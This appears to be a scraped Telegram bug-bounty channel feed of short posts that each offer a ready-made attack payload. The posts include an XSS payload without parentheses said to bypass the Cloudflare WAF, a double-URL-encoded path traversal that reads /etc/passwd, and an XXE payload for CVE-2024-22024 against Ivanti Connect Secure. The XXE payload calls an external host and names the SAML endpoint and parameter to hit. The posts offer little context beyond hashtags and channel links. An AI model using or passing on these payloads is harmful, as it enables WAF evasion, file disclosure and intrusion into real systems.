Bypass Cloudflare WAF (XSS without parentheses)
#xss #bugbountytips #infosec
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
javascript:var{a:onerror}={a:alert};throw%20document.domain#xss #bugbountytips #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡1❤1🔥1
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag
#bugbountytips #bugbounty
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
javascript:var{a:onerror}={a:alert};throw%20document.domain#bugbountytips #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1🔥1
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"#bugbountytips #bugbounty #CyberSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🔥2❤🔥1⚡1
CVE-2024-22024
XXE on Ivanti Connect Secure
☠️ payload encoded base64:
send it to:
#bugbountytips #cve #Ivanti
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
XXE on Ivanti Connect Secure
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm#bugbountytips #cve #Ivanti
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤2🔥1